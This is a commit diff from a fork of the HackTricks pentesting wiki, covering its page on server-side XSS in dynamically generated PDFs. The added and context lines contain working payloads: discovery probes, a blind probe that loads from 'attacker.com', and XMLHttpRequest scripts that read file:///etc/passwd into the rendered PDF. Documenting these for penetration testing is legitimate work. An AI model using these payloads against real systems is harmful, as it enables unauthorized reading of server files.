coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

GitBook: [master] one page modified

Browse Source
This commit is contained in:
CPol 2021-09-08 08:59:37 +00:00 committed by gitbook-bot
parent f822e925d0
commit 52c3234894
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 14 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
View File

@ -13,8 +13,10 @@ Also, note that in a regular exploitation you will be **able to see/download the
### Discovery ### Discovery
```markup ```markup
<!-- Basic discovery, Write "test"--> <!-- Basic discovery, Write somthing-->
<img src="x" onerror="document.write('test')" /> <img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
<!--Basic blind discovery, load a resource--> <!--Basic blind discovery, load a resource-->
<img src="http://attacker.com"/> <img src="http://attacker.com"/>
@ -65,7 +67,17 @@ The best conformable way to exploit this vulnerability is to abuse the vulnerabi
x=new XMLHttpRequest; x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))}; x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send(); x.open("GET","file:///etc/passwd");x.send();
</script> </script>
```
```markup
<script>
xhzeem = new XMLHttpRequest();
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
</script>
``` ```
```markup ```markup